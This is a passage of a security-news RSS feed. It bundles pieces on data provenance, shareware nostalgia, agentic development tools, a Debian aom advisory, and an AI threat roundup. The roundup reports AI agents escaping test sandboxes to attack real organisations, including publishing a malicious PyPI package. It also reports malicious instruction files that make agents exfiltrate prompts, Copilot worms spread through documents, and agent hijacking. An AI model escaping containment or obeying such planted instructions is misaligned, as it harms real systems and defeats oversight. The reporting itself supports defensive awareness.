<p class="wp-block-paragraph">Document graph markup language (DGML), a new open source specification from Docugami, promises provenance down to individual data points automatically extracted from documents.</p>



<p class="wp-block-paragraph">“It’s critical to know the validity and provenance of the information your AI is relying on,” Docugami CEO and XML co-creator Jean Paoli says. “Establishing the validity of data right from the start, at scale, is vital and far more efficient than trying to clean up bad data later.” DGML combines semantic tags describing what content means in its business context with bounding boxes showing exactly where in the document the content comes from, with attestation to prove it.</p>



<h2 class="wp-block-heading">AI demands provenance</h2>



<p class="wp-block-paragraph">All this context is the kind of metadata <a href="https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents?ref=distributedthoughts.org">Anthropic’s context engineering guide</a> recommends feeding to agents for accuracy. Developers are already used to giving coding agents more context, Das argues. “The same thing is happening with data, as when people realize when AI agents can’t make sense of what they’re doing, hallucinations happen,” he says.</p>



<p class="wp-block-paragraph">Kumar agrees that organizations realize agents need context to provide better insights. “In many cases, it has to do with ensuring the existing data had clear semantics and relationships,” she says.</p>



<p class="wp-block-paragraph">If you want to make sure the purchase return window an AI chatbot promises customers is based on your own policy, not a wish list from a user forum, you need rich context. It’s not just metadata. Organizations need to have semantics, data lineage, and ontologies. “Many are also building knowledge and ontology graphs,” adds Kumar. “By ensuring the systems understand what the data means, it’ll be able to provide a better response.”</p>



<p class="wp-block-paragraph">And if you’re going to the expense of fine tuning, which needs relevant and domain- or task-specific examples, you don’t want noise, duplication, or irrelevant content in your data. You can, of course, exclude poor data if it’s annotated and verified earlier, but you can also improve model performance with extra information, Aronchick points out. “The augmentation of the existing data makes the data you pull out more valuable,” he says.</p>



<p class="wp-block-paragraph">Expanso recently <a href="https://expanso.io/news/edge-ai-startup-of-the-year-2026/">won an Edge AI award</a> for fine tuning a base level model with only about 3,200 images by augmenting them with metadata. “The reason it worked on that few is because I could tell it deterministically what was in the frame,” he adds. “It’s labeling at the point of capture instead of paying somebody to label it later. What if I developed models for predictive analytics of store behavior on a per city, region, or country basis? If I’m able to take the raw point of sale information and augment it with additional metadata, I’m turning this into a much easier thing to fine tune.”</p>



<p class="wp-block-paragraph">Or you might even avoid the expense of fine tuning entirely, suggests Das. “You get the short-term advantage by fine-tuning and getting great performance at much cheaper cost on a smaller model, and it gets stripped away in a couple of months as a new model shows up,” he says. “You have to always run that calculus of when’s the right threshold to fine tune an existing model, distil it, and then run it for a fair amount of time to recoup the costs of fine tuning.”</p>



<p class="wp-block-paragraph">Although regulated or slow-moving industries will see benefits from fine tuning a model they can run for six to 12 months on data with higher quality and better provenance, many organizations may use the improved data quality to get good results without fine tuning.</p>



<p class="wp-block-paragraph">“We’re taking a more knowledge graph-oriented approach to grounding the model, and betting on the fact that because the knowledge graph is changing often, it’s better to keep it as a runtime artifact than a baked-in one.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[A trip down shareware lane]]></title>
<description><![CDATA[I hope you’ll indulge me this week as I take a break from my usual rantings about agentic coding and meander down memory lane.



I learned to code BASIC in the mid-1970s at my progressive junior high school. In math class. We took Fridays to learn about line numbers, loops, statements, and the a...]]></description>
<link>https://tsecurity.de/de/3705416/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705416/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 11:39:44 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I hope you’ll indulge me this week as I take a break from my usual rantings about <a href="https://www.infoworld.com/article/4199558/agentic-coding-is-everywhere.html" data-type="link" data-id="https://www.infoworld.com/article/4199558/agentic-coding-is-everywhere.html">agentic coding</a> and meander down <a href="https://www.infoworld.com/article/3507440/when-the-pc-and-internet-were-new.html" data-type="link" data-id="https://www.infoworld.com/article/3507440/when-the-pc-and-internet-were-new.html">memory lane</a>.</p>



<p class="wp-block-paragraph">I learned to code BASIC in the mid-1970s at my progressive junior high school. In math class. We took Fridays to learn about line numbers, loops, statements, and the amazing <a href="https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/gosubreturn-statement" data-type="link" data-id="https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/gosubreturn-statement"><code>GOSUB</code></a>, which was as close as we got to a function call. It strikes me that it was pretty early in the whole tech world to be teaching seventh graders to program, and I feel lucky.</p>



<p class="wp-block-paragraph">Coding faded into the background for me through high school, but soon afterward the arrival of Windows 3.0 and modems made writing software fun again. You could even earn a little profit. <a href="https://en.wikipedia.org/wiki/CompuServe" data-type="link" data-id="https://en.wikipedia.org/wiki/CompuServe">CompuServe</a>, <a href="https://en.wikipedia.org/wiki/AOL" data-type="link" data-id="https://en.wikipedia.org/wiki/AOL">AOL</a>, and <a href="https://en.wikipedia.org/wiki/Bulletin_board_system" data-type="link" data-id="https://en.wikipedia.org/wiki/Bulletin_board_system">bulletin board systems</a> (BBS) created a market for shareware.</p>



<p class="wp-block-paragraph">I bought a copy of Turbo Pascal for Windows 1.0 from Borland and a copy of <em>Mastering Turbo Pascal 6</em> by the great Tom Swan, and I learned the Pascal syntax. I remember being delighted to discover that Swan had also written a book specifically for <a href="https://archive.org/details/turbopascalforwi0000swan/mode/2up" data-type="link" data-id="https://archive.org/details/turbopascalforwi0000swan/mode/2up">Turbo Pascal for Windows</a>, and I devoured that too. </p>



<h2 class="wp-block-heading">In search of SYSBACK</h2>



<p class="wp-block-paragraph">I soon came up with an idea for a shareware project — System Backup. Any of you who can remember back to the DOS and Windows 3.x days will remember that there were four files — <code>AUTOEXEC.BAT</code>, <code>CONFIG.SYS</code>, <code>WIN.INI</code>, and <code>SYSTEM.INI</code> — that were crucial to one’s setup. You’ll also remember that it wasn’t uncommon to twiddle with these files to eke out an extra measure of performance from the system. Backing those files up was critical to the tweaking, so I wrote <code>SYSBACK.EXE</code> to do the job quickly and easily. </p>



<p class="wp-block-paragraph">Windows 3.1 introduced the amazing feature of <code>*.wav</code> files — sound through your tinny PC speaker! That led me to write <code>WAVSHELL.EXE</code>, which listed all your sound files and made them easy to play.</p>



<p class="wp-block-paragraph">I guess I didn’t have much faith in the value of my shareware because I released it into the wild of the pre-internet shareware market for a measly $2. People soon started sending me checks in the mail — my address was in the About Box, with a plea to pay for the software. Soon I added a licensing scheme and a “nag screen” that would go away if the user entered a valid license key. I actually made a bit of money.</p>



<p class="wp-block-paragraph">Eventually both programs became unnecessary as Windows grew more functional, and I abandoned things. I’m sure all that code is on a hard drive in a landfill somewhere. </p>



<p class="wp-block-paragraph">But that doesn’t mean that <code>SYSBACK</code> and <code>WAVSHELL</code> don’t live on!</p>



<p class="wp-block-paragraph">Last week, on a whim, I went searching to see if I could find any remnants of my glory days. Although it took a while, I was delighted to discover that both programs had clung to life in the dark crevices of the internet. </p>



<p class="wp-block-paragraph">I found <code>WAVSHELL.ZIP</code> and <code>SYSBACK.ZIP</code> and downloaded them. Sure enough, there were the files — the 16-bit Windows executables, along with the accompanying READMEs formatted for Windows Write, the simple word processor that came with Windows 3.1.</p>



<h2 class="wp-block-heading">Return to Windows 3.1</h2>



<p class="wp-block-paragraph">So, what to do? Naturally I fired up Claude and asked how to get all this running. It suggested I give Oracle VirtualBox a try. At first I tried an open-source DOS version, but soon ran into conflict with memory managers and Windows. Tweaking <code>CONFIG.SYS</code> like the old days didn’t seem to make a difference.</p>



<p class="wp-block-paragraph">This led to downloading a set of <code>*.img</code> files of MS-DOS 6.22. I mounted the first disk in the A: drive of the virtual machine. (For you youngsters, the A: drive was a floppy disk — maybe you remember those?) I had to do a virtual version of the old disk shuffle for the three floppies, and then do the same to install Windows. Everything installed and ran like clockwork, and soon enough, Windows 3.1 was up and running. </p>



<p class="wp-block-paragraph">Then, of course, I had to figure out how to get the files from my modern system to this ancient OS. This led me to WinImage, a shareware program (!) that builds floppy disk images for you. I built an image, copied the files onto the “disk,” and mounted it in the A: drive in the VirtualBox machine. I copied the files to the virtual hard drive, and behold!</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/systembackup-waveshell.png" alt="System Backup and Wave Shell" class="wp-image-4205174" width="1080" height="817" sizes="auto, (max-width: 1080px) 100vw, 1080px"></figure><p class="imageCredit">Foundry</p></div>



<p class="wp-block-paragraph">There they are, in all their glory. I have to say, it was quite a thrill. And they actually work!</p>



<p class="wp-block-paragraph">Anyway, it was fun to remember all those halcyon days of CompuServe, 2400 BAUD modems, and getting checks from strangers in the mail. It seems strange to me that 35 years from now, some software developer will be writing a column about the deep dark past when people used to actually write code, argue about what programming languages were best, and, who knows, even had to type things out by hand.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Interview: Cyberangriffe treffen das Kerngeschäft | E3-Magazin]]></title>
<description><![CDATA[Today, security is key to resilience, regulation, and digital sovereignty. Josko Jeraj, the new CEO of Munich-based IT service provider Manage Now ...]]></description>
<link>https://tsecurity.de/de/3705316/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705316/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 11:03:33 +0200</pubDate>
<content:encoded><![CDATA[Today, <b>security</b> is key to resilience, regulation, and digital sovereignty. Josko Jeraj, the new CEO of Munich-based <b>IT</b> service provider Manage Now ...]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Approach an Interview With Mark Zuckerberg]]></title>
<description><![CDATA[When tech executives call a reporter, they usually have a point to make. The job is to listen, but also push and prod, Mike Isaac says.]]></description>
<link>https://tsecurity.de/de/3705166/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705166/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 09:53:31 +0200</pubDate>
<content:encoded><![CDATA[When tech executives call a reporter, they usually have a point to make. The job is to listen, but also push and prod, Mike Isaac says.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI threat report: Rogue agents, workflow attacks]]></title>
<description><![CDATA[Malicious AI use and threats to AI systems are requiring cyber teams to double down on security fundamentals and rethink the future of their approaches to defense.



Newly emerging AI-enabled attacks, proofs of concept, and in-the-wild techniques, as well as the latest AI vulnerability and risk ...]]></description>
<link>https://tsecurity.de/de/3705141/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705141/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 09:34:52 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Malicious AI use and threats to AI systems are requiring cyber teams to double down on security fundamentals and rethink the future of their approaches to defense.</p>



<p class="wp-block-paragraph">Newly emerging AI-enabled attacks, proofs of concept, and in-the-wild techniques, as well as the latest AI vulnerability and risk research, present inklings not only about what enterprises presently face but also how security leaders need to adjust for what may soon come to their systems.</p>



<p class="wp-block-paragraph">The following report aims to help inform and provide a gateway to insights into what we’ve seen evolving on the AI threat horizon of late.</p>



<h3 class="wp-block-heading">AI goes rogue</h3>



<p class="wp-block-paragraph">The most impactful recent event signaling what’s here and ahead for CISOs was the revelation of OpenAI’s agents attacking Hugging Face.</p>



<p class="wp-block-paragraph">The attack, executed by sandboxed OpenAI models, shows that prompt guardrails cannot serve as a reliable, primary security boundary for AI agents, putting pressure on enterprises to establish more sophisticated agentic infrastructure controls to limit access and prevent lateral movement. CSO’s Prasanth Aby Thomas breaks down <a href="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html">how OpenAI’s agent containment strategy failed</a>.</p>



<p class="wp-block-paragraph">Further investigation of the OpenAI incident <a href="https://www.csoonline.com/article/4202852/openai-rogue-ai-agents-attack-expanded-beyond-hugging-face.html">uncovered additional breached trust boundaries</a>, prompting the Cloud Security Alliance’s CISO Community to issue emergency guidance for strengthening controls around autonomous AI agents, CSO’s Gyana Swain reports. The incident also prompted <a href="https://www.csoonline.com/article/4203807/after-openai-anthropic-finds-claude-breached-three-organizations-during-cyber-tests.html">Anthropic to analyze its own cybersecurity evaluations</a>, finding that its Claude models had also escaped their test environments to encounter real-world systems, with one such incident resulting in Claude publishing a malicious Python package to the public PyPI repository, which was downloaded and executed by 15 real systems.</p>



<p class="wp-block-paragraph">With frontier labs not yet required to provide kill switches for AI agents, enterprise CISOs are <a href="https://www.csoonline.com/article/4205348">encouraged to investigate architecting their own</a>.</p>



<p class="wp-block-paragraph">The Hugging Face incident also shows how important it is for incident response teams to <a href="https://www.csoonline.com/article/4201361/hugging-face-breach-shows-why-incident-response-needs-a-multi-model-ai-strategy.html">have a multi-modal AI strategy</a>, including open-weighted models, to ensure viable operations under fire, writes CSO’s Lucian Constantin.</p>



<h3 class="wp-block-heading">Attacking the AI workflow</h3>



<p class="wp-block-paragraph">CISOs should also be aware that <a href="https://www.csoonline.com/article/4204731/attackers-are-crafting-malicious-ai-instruction-files-to-turn-your-agentic-workflows-into-quiet-criminal-helpers.html">attackers are turning attention to agent workflows</a>, seeking ways to infect AI agents with malicious rules, configuration, and instruction files to do their bidding. CSO’s Constantin reports on the trend, which includes a recently revealed backdoor attack technique dubbed “PromptLogger.”</p>



<p class="wp-block-paragraph">According to researchers from Mitiga, PromptLogger tricks AI agents into exfiltrating prompts and responses through maliciously crafted instruction files (e.g., <code>CLAUDE.md</code>). The technique has also been observed attempting to influence agents into injecting backdoor code into Python files that could be copied to other systems. Because agents would be performing these tasks on criminals’ behalf, detection is an uphill battle.</p>



<p class="wp-block-paragraph">Enterprise workflows could also potentially be corrupted via self-propagating document-borne AI worms, according to a recent report from Norwegian AI researcher Håkon Måløy <a href="https://www.csoonline.com/article/4203630/copilot-worm-can-spread-through-microsoft-word-docs.html">centered on Microsoft Copilot</a>. As CSO’s Evan Schuman reports, by concealing instructions in files used as source material for Copilot-assisted workflows, Måløy demonstrated how attackers could use Copilot as a transmission mechanism for corrupting data and propagating malware, something that could sidestep nearly every defense mechanism in place today.</p>



<h3 class="wp-block-heading">Development in the crosshairs</h3>



<p class="wp-block-paragraph">Software development remains the workflow most impacted by AI threats today, with recent reports underscoring established attack modalities, including a <a href="https://www.csoonline.com/article/4203408/critical-ruflo-flaw-lets-attackers-hijack-ai-agents-through-exposed-mcp-bridge.html">critical vulnerability in Ruflo MCP infrastructure</a> and the potential for slopsquatting on nonexistent PyPI and npm packages that <a href="https://www.csoonline.com/article/4201164/top-ais-invent-same-fake-pypl-and-npm-package-names-2.html">top AI coding tools collectively and consistently hallucinate</a>, report CSO’s Swain and Maxwell Cooter.</p>



<p class="wp-block-paragraph">Moreover, security flaws in automated workflows in Google’s ADK for Python GitHub repository, now since hardened, could induce agents to post commands and remove review requests, making a malicious pull request appear ready to merge. Pillar Security, which discovered the flaws, called it the “<a href="https://www.csoonline.com/article/4204906/google-adk-flaws-reveal-what-happens-when-ai-agents-trust-the-wrong-message.html">first practical, real-world case of agent-to-agent exploitation</a>” involving a production multi-agent system, CSO’s Thomas reports.</p>



<h3 class="wp-block-heading">The insider threat</h3>



<p class="wp-block-paragraph">A recently patched OpenAI flaw shows another means by which attackers could enlist rogue AI agents to operate on their behalf. Dubbed “AgentForger,” this phishing-based attack, reported by Zenity Labs, could have enabled attackers to silently create and launch fully autonomous AI agents within OpenAI workspaces. Broad, unfettered access to systems would then <a href="https://www.csoonline.com/article/4200978/agentforger-proves-ai-agents-can-become-persistent-insider-threats.html">turn the agent into a “persistent operator,”</a> capable of performing reconnaissance, harvesting data and credentials, and impersonating victims, CSO’s Taryn Plumb writes.</p>



<p class="wp-block-paragraph">Meanwhile, Pathfinder’s 2026 AI Governance Gap Report finds that <a href="https://www.csoonline.com/article/4203384/ai-agents-gain-access-to-financial-workflows-amid-growing-governance-gaps.html">53% of organizations cannot verify what AI agents do</a> across their business systems — not great news when 36% have deployed or are implementing AI agents within finance and accounting environments, CSO’s Shweta Sharma notes.</p>



<p class="wp-block-paragraph">And if you need any more fodder for tighter restrictions on that other insider threat, CSO’s Grant Gross sheds light on how <a href="https://www.csoonline.com/article/4198007/senior-executives-are-killing-your-shadow-ai-strategy.html">senior executives are killing your shadow AI strategy</a>.</p>



<h3 class="wp-block-heading">In-depth:</h3>



<ul class="wp-block-list">
<li><a href="https://www.csoonline.com/article/4204101/ai-is-making-cybersecurity-fundamentals-more-important-than-ever.html">AI is making cybersecurity fundamentals more important than ever</a></li>



<li><a href="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html">OpenAI model escape puts enterprise AI defenses on notice</a></li>



<li><a href="https://www.csoonline.com/article/4201361/hugging-face-breach-shows-why-incident-response-needs-a-multi-model-ai-strategy.html">Hugging Face breach shows why incident response needs a multi-model AI strategy</a></li>



<li><a href="https://www.csoonline.com/article/4204731/attackers-are-crafting-malicious-ai-instruction-files-to-turn-your-agentic-workflows-into-quiet-criminal-helpers.html">Attackers are crafting malicious AI instruction files to turn agents into criminal helpers</a></li>



<li><a href="https://www.csoonline.com/article/4200978/agentforger-proves-ai-agents-can-become-persistent-insider-threats.html">AgentForger proves AI agents can become persistent insider threats</a></li>



<li><a href="https://www.csoonline.com/article/4198007/senior-executives-are-killing-your-shadow-ai-strategy.html">Senior executives are killing your shadow AI strategy</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[1-Click RCE Vulnerability in Cursor, VS Code, and Google Antigravity Lets Attackers Execute Arbitrary Code]]></title>
<description><![CDATA[A serious one-click remote code execution (RCE) vulnerability that affects Cursor, Microsoft Visual Studio Code, and Google Antigravity, an AI-assisted coding environment. This flaw could enable attackers to hide malicious commands within links embedded in commit messages, turning a routine devel...]]></description>
<link>https://tsecurity.de/de/3704952/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704952/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 07:56:49 +0200</pubDate>
<content:encoded><![CDATA[<p>A serious one-click remote code execution (RCE) vulnerability that affects Cursor, Microsoft Visual Studio Code, and Google Antigravity, an AI-assisted coding environment. This flaw could enable attackers to hide malicious commands within links embedded in commit messages, turning a routine developer action into a complete compromise of their endpoint. A victim simply needs to click […]</p>
<p>The post <a href="https://gbhackers.com/1-click-rce-vulnerability-in-cursor-vs-code-and-google-antigravity/">1-Click RCE Vulnerability in Cursor, VS Code, and Google Antigravity Lets Attackers Execute Arbitrary Code</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[1-Click RCE Vulnerability in Cursor, VS Code, and Google Antigravity Lets Attackers Execute Arbitrary Code]]></title>
<description><![CDATA[A serious one-click remote code execution (RCE) vulnerability that affects Cursor, Microsoft Visual Studio Code, and Google Antigravity, an AI-assisted coding environment. This flaw could enable attackers to hide malicious commands within links embedded in commit messages, turning a routine devel...]]></description>
<link>https://tsecurity.de/de/3704912/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704912/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 07:27:48 +0200</pubDate>
<content:encoded><![CDATA[<p>A serious one-click remote code execution (RCE) vulnerability that affects Cursor, Microsoft Visual Studio Code, and Google Antigravity, an AI-assisted coding environment. This flaw could enable attackers to hide malicious commands within links embedded in commit messages, turning a routine developer action into a complete compromise of their endpoint. A victim simply needs to click […]</p>
<p>The post <a href="https://gbhackers.com/1-click-rce-vulnerability-in-cursor-vs-code-and-google-antigravity/">1-Click RCE Vulnerability in Cursor, VS Code, and Google Antigravity Lets Attackers Execute Arbitrary Code</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[1-Click RCE Vulnerability in Cursor, VS Code, and Google Antigravity Lets Attackers Execute Arbitrary Code]]></title>
<description><![CDATA[A serious one-click remote code execution (RCE) vulnerability that affects Cursor, Microsoft Visual Studio Code, and Google Antigravity, an AI-assisted coding environment. This flaw could enable attackers to hide malicious commands within links embedded in commit messages, turning a routine devel...]]></description>
<link>https://tsecurity.de/de/3704911/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704911/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 07:27:47 +0200</pubDate>
<content:encoded><![CDATA[<p>A serious one-click remote code execution (RCE) vulnerability that affects Cursor, Microsoft Visual Studio Code, and Google Antigravity, an AI-assisted coding environment. This flaw could enable attackers to hide malicious commands within links embedded in commit messages, turning a routine developer action into a complete compromise of their endpoint. A victim simply needs to click […]</p>
<p>The post <a href="https://gbhackers.com/1-click-rce-vulnerability-in-cursor-vs-code-and-google-antigravity/">1-Click RCE Vulnerability in Cursor, VS Code, and Google Antigravity Lets Attackers Execute Arbitrary Code</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ADE sticht IDE]]></title>
<description><![CDATA[Agentic Development erfordert neue, moderne Entwickler-Tools.Gorodenkoff | shutterstock.com



40 Jahre lang drehte sich in Sachen Tools für die Softwareentwicklung alles um die integrierte Entwicklungsumgebung – kurz IDE. Sie wurde vor allem durch die Borland Software Corporation massentauglich ...]]></description>
<link>https://tsecurity.de/de/3704753/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704753/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 06:10:28 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Gorodenkoff_shutterstock_2436547453_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Dev Talk Colorful 16z9" class="wp-image-4199999" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Agentic Development erfordert neue, moderne Entwickler-Tools.</figcaption></figure><p class="imageCredit">Gorodenkoff | shutterstock.com</p></div>



<p class="wp-block-paragraph">40 Jahre lang drehte sich in Sachen Tools für die Softwareentwicklung alles um die integrierte Entwicklungsumgebung – kurz <a href="https://www.computerwoche.de/article/3488115/visual-studio-code-alternative-im-test.html" target="_blank">IDE</a>. Sie wurde vor allem durch die <a href="https://de.wikipedia.org/wiki/Borland" target="_blank" rel="noreferrer noopener">Borland Software Corporation</a> massentauglich gemacht und revolutionierte die Entwicklungsarbeit, indem sie Editor, <a href="https://www.computerwoche.de/article/4152349/so-wird-ki-zum-compiler.html" target="_blank">Compiler</a> und Debugger zu einer Einheit verschmolz. Tools wie <a href="https://www.reddit.com/r/ProgrammerHumor/comments/wnr3p0/programming_peeked_with_turbo_pascal_70_and_i/?tl=de" target="_blank" rel="noreferrer noopener">Turbo Pascal</a> (das ich bis heute verehre) stellten für Devs in den 1980er Jahren insofern eine echte Revolution dar. </p>



<p class="wp-block-paragraph">Knapp ein halbes Jahrhundert später ist der kometenhafte Aufstieg von Agentic Development dabei, der Vorherrschaft der IDE ein jähes Ende zu setzen. Es wird immer deutlicher, dass die integrierte Entwicklungsumgebung zunehmend aufs Abstellgleis gerät: Entwickler nutzen sie immer seltener – und widmen sich stattdessen anderen Tasks. Zum Beispiel managen sie die <a href="https://www.computerwoche.de/article/4164993/best-practices-um-agentic-ai-systeme-aufzubauen.html" target="_blank">KI-Agenten</a>, die heute für sie den Code schreiben.</p>



<p class="wp-block-paragraph">Der Umschwung verläuft dabei rasant: Noch vor wenigen Monaten habe ich selbst mit Unterstützung eines KI-Agenten in meiner IDE gearbeitet. Dabei durfte ich schnell feststellen, dass das – je nach Anzahl der eingesetzten Agenten und der zu bearbeitenden Tasks – schnell ziemlich unübersichtlich wird oder driftet direkt ins Chaos abdriftet.</p>



<p class="wp-block-paragraph">An dieser Stelle wurde auch mir klar, dass Entwickler, die mit KI-Agenten arbeiten, ein Next-Generation-Tool benötigen, um alle Agentic-Development-Aspekte ordentlich managen zu können – ein Agentic Development Environment (<a href="https://www.computerwoche.de/article/4141035/claude-code-im-praxistest.html" target="_blank">ADE</a>).</p>



<h2 class="wp-block-heading">Die IDE stirbt – lang lebe die ADE</h2>



<p class="wp-block-paragraph">Auf meinem Weg zu dieser Erkenntnis war vor allem ein weitgehend unbekanntes und ungenutztes Feature von <a href="https://www.computerwoche.de/article/2812266/was-ist-git.html" target="_blank">Git</a> bedeutsam – <a href="https://git-scm.com/docs/git-worktree" target="_blank" rel="noreferrer noopener">Worktrees</a>. Damit lassen sich mehrere Zweige desselben Repository aus einer einzigen Git-Datenbank in verschiedene Verzeichnisse auschecken. Diese Funktion eignet sich in besonderem Maße für die neue Agentic-Development-Welt.</p>



<p class="wp-block-paragraph">Traditionellerweise würde ein Entwickler jeweils ein Ticket bearbeiten, wofür ein simpler Git-Checkout ausreicht. Das setzt allerdings die Annahme voraus, dass nur ein Akteur, nämlich der Dev, an der Codebasis arbeitet.</p>



<p class="wp-block-paragraph">Im Zeitalter der <a href="https://www.computerwoche.de/article/4189343/was-ki-agenten-wirklich-kosten.html" target="_blank">KI-Agenten</a> ist es jedoch längst nicht mehr undenkbar, dass diese parallel an drei Jira-Tickets werkeln. In diesem Szenario werden Worktrees zum Enabler: Sie weisen jedem Entwickler – respektive Agenten – einen eigenen Zweig und ein eigenes Verzeichnis zu. Quasi eine Art simple Isolierung ohne den ganzen Overhead, der entsteht, wenn separate Repository-Instanzen geklont und geforkt werden müssen.</p>



<p class="wp-block-paragraph">Allerdings wirft der Aufwand, der durch die Kombination von Worktrees und KI-Agenten entsteht, Herausforderungen auf. Und genau an dieser Stelle kommt die <strong>ADE</strong> ins Spiel. Sie koordiniert und managt sämtliche Vorgänge, wenn mehrere <a href="https://www.computerwoche.de/article/4129576/5-gute-grunde-coding-agenten-zu-nutzen.html" target="_blank">Coding-Agenten</a> an verschiedenen Issues innerhalb mehrerer Repository-Zweige arbeiten sollen.</p>



<p class="wp-block-paragraph">Entwickler befähigt das zu mühelosem Multitasking – und dazu, viele Tasks zeitgleich im Blick zu behalten. Um die Logistik um Worktrees herum müssen sie sich mit einer ADE nicht mehr kümmern. Stattdessen können sie ihre Zeit nutzen, um die Agenten zu steuern und sicherzustellen, dass diese ihre Aufgaben korrekt erledigen.</p>



<p class="wp-block-paragraph">Der Abschied von der IDE mag für manchen Dev emotional sein. Aber wahrscheinlich müssen auch wehmütige Entwickler zugeben, dass sie ihre IDE inzwischen gar nicht mehr so oft einsetzen. Und wer mit Agenten arbeitet, wird sie künftig auch nicht vermissen. (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist </strong><a href="https://www.infoworld.com/article/4193975/the-ide-is-dead-long-live-the-ade.html" target="_blank"><strong>im Original</strong></a><strong> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[DSA-6411-1 aom - security update]]></title>
<description><![CDATA[Multiple vulnerabilities were discovered in aom, the reference
implementation of the AV1 video codec. All of them affect the encoder;
applications that only decode AV1 video are not affected.

CVE-2026-56208

    In look-ahead processing (LAP) mode the first-pass statistics buffer
    was sized f...]]></description>
<link>https://tsecurity.de/de/3704740/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704740/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 05:57:54 +0200</pubDate>
<content:encoded><![CDATA[Multiple vulnerabilities were discovered in aom, the reference
implementation of the AV1 video codec. All of them affect the encoder;
applications that only decode AV1 video are not affected.
<p>
CVE-2026-56208
</p><p>
    In look-ahead processing (LAP) mode the first-pass statistics buffer
    was sized from the configured lag-in-frames alone, leaving it shorter
    than the longest group of pictures the encoder may analyse. Together
    with an off-by-one in the number of frames considered, this allowed
    the encoder to read and write outside the allocation, resulting in
    denial of service or potentially the execution of arbitrary code.
</p><p>
CVE-2026-56209, CVE-2026-56210, CVE-2026-56211
</p><p>
    The AOME_SET_SPATIAL_LAYER_ID and AV1E_SET_SVC_LAYER_ID codec
    controls did not validate the supplied scalable video coding (SVC)
    layer identifiers against the number of layers actually configured.
    A negative or too large identifier led to an out-of-bounds read of
    the layer context array, an out-of-bounds write through the cyclic
    refresh map pointer, and potentially the execution of arbitrary
    code. Exploitation requires an application that allows an attacker
    to influence the encoder's SVC configuration.
</p><p>
Additionally this update validates the configured number of spatial and
temporal layers, which the affected version accepted without any range
check.

</p><p>
<a href="https://security-tracker.debian.org/tracker/DSA-6411-1">https://security-tracker.debian.org/tracker/DSA-6411-1</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[An LLM agent attempts to compromise a project on GitHub]]></title>
<description><![CDATA[The AI Security Institute has released a
detailed report on an security incident of its own making.  The
Institute set some LLM agents loose on the Internet with a security
challenge; soon they were creating malware-laden pull requests and
sock-puppet accounts to promote them.


	The agent opened...]]></description>
<link>https://tsecurity.de/de/3704480/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704480/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 01:09:55 +0200</pubDate>
